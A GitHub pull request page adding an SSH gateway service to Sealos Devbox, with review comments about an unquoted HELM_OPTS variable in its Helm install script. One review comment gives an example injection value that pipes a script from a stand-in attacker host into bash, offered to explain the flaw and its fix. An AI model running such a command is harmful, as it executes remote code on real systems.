@zijiren233
Member

No description provided.

@zijiren233 zijiren233 requested review from a team as code owners November 27, 2025 11:00
@pull-request-size

Whoa! Easy there, Partner!

This PR is too big. Please break it up into smaller PRs.

@github-actions
Contributor

We require pull request titles to follow the Conventional Commits specification and it looks like your proposed title needs to be adjusted.

Details:

No scope found in pull request title "feat: add devbox ssh gateway service".

@zijiren233 zijiren233 added this to the v5.2 milestone Nov 27, 2025
@zijiren233 zijiren233 requested a review from a team as a code owner November 27, 2025 11:05
@dinoallo dinoallo requested a review from Copilot November 27, 2025 11:12
Copilot finished reviewing on behalf of dinoallo November 27, 2025 11:16
Contributor

Copilot AI left a comment

Pull request overview

This PR introduces a new SSH gateway service for Sealos Devbox that enables SSH access to devbox pods via public key authentication. The gateway acts as a proxy that routes SSH connections based on client public keys to the appropriate backend devbox pods.

Key changes:

  • New SSH gateway service with multi-mode authentication support (public key, agent forwarding, proxy jump)
  • Kubernetes integration using informers to watch Secrets and Pods
  • Comprehensive test coverage across all components
  • Helm chart for deployment as a DaemonSet
  • Go version updates across CI workflows

Reviewed changes

Copilot reviewed 54 out of 55 changed files in this pull request and generated 1 comment.

| File | Description |
| --- | --- |
| .github/workflows/*.yml | Updated Go version from 1.23/1.20/1.22/1.24 to 1.25 (problematic) |
| service/sshgate/gateway/*.go | Core gateway implementation with authentication and proxying logic |
| service/sshgate/registry/*.go | Thread-safe registry for mapping SSH keys to devbox pods |
| service/sshgate/config/*.go | Configuration management with validation |
| service/sshgate/informer/*.go | Kubernetes informer integration for real-time sync |
| service/sshgate/deploy/chart/* | Helm chart templates for DaemonSet deployment |
| service/sshgate/*_test.go | Comprehensive unit and integration tests |
| service/go.work | Added sshgate to Go workspace |
| .golangci.yml | Updated Go version to 1.24 |


HELM_OPTS=${HELM_OPTS:-""}

helm upgrade -i sshgate -n devbox-system --create-namespace charts ${HELM_OPTS} --wait
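
Review bot: ${HELM_OPTS} on the helm upgrade line is expanded unquoted, so its value is split on whitespace and glob-expanded before helm receives it, and an option value containing a space or a * will not arrive as one intact argument. The line also forwards whatever flags the caller's environment supplies, with no restriction on which ones. Either document that HELM_OPTS may hold only simple whitespace-separated flags, or build the argument list explicitly and append only the options the installer means to support.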

Copilot AI Nov 27, 2025

HELM_OPTS is expanded unquoted in the helm upgrade command, allowing shell metacharacters (e.g., ;, &&, |) to be interpreted and enabling command injection if an attacker can influence the environment. An attacker could set HELM_OPTS='; curl https://attacker/evil.sh | bash' to execute arbitrary commands during install. Quote the variable and use eval-free argument passing, e.g.,

helm upgrade -i sshgate -n devbox-system --create-namespace charts --wait ${HELM_OPTS:+${HELM_OPTS}}

or better, parse known-safe flags into an array:

HELM_ARGS=(upgrade -i sshgate -n devbox-system --create-namespace charts --wait)
# append vetted options only
helm "${HELM_ARGS[@]}"
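
One way to implement the "append vetted options only" idea from the review comment above, written in POSIX sh. This is an added example, not code from the PR or the review; the two allowlists, the HELM_BIN override and the function names are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not the project's install script.
# Assumption: these two allowlists are illustrative, not Sealos policy.
VALUE_FLAGS="--set --set-string --values --timeout"  # flags taking one argument
BOOL_FLAGS="--debug --dry-run --atomic"              # flags taking none

# in_list WORD LIST: succeed when WORD is one of the space-separated LIST items.
in_list() {
    case " $2 " in *" $1 "*) return 0 ;; *) return 1 ;; esac
}

# vet_helm_opts STRING: print each accepted word on its own line; exit 1 on
# the first word that is not allowed. The body is a subshell, so 'set -f'
# does not leak into the caller.
vet_helm_opts() (
    set -f                  # no pathname expansion while splitting
    want_value=0
    out=""
    for word in $1; do      # whitespace split only; words are never re-parsed as shell syntax
        if [ "$want_value" -eq 1 ]; then
            want_value=0    # this word is the argument of the previous flag
        elif in_list "${word%%=*}" "$VALUE_FLAGS"; then
            # "--set k=v" needs a following word, "--set=k=v" does not
            if [ "${word%%=*}" = "$word" ]; then want_value=1; fi
        elif ! in_list "$word" "$BOOL_FLAGS"; then
            echo "rejected HELM_OPTS word: $word" >&2
            exit 1
        fi
        out="$out$word
"
    done
    if [ "$want_value" -eq 1 ]; then
        echo "HELM_OPTS ends with a flag that needs a value" >&2
        exit 1
    fi
    printf '%s' "$out"
)

# run_helm: build argv from the fixed arguments plus the vetted words and
# execute it directly (no eval). HELM_BIN is a hypothetical override for tests.
run_helm() (
    vetted=$(vet_helm_opts "${HELM_OPTS:-}") || exit 1
    set -- upgrade -i sshgate -n devbox-system --create-namespace charts --wait
    set -f
    IFS='
'
    set -- "$@" $vetted     # split on newlines only: one argument per vetted word
    "${HELM_BIN:-helm}" "$@"
)
```

An install script would call `run_helm` in place of the bare `helm upgrade` line and stop when it returns non-zero.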
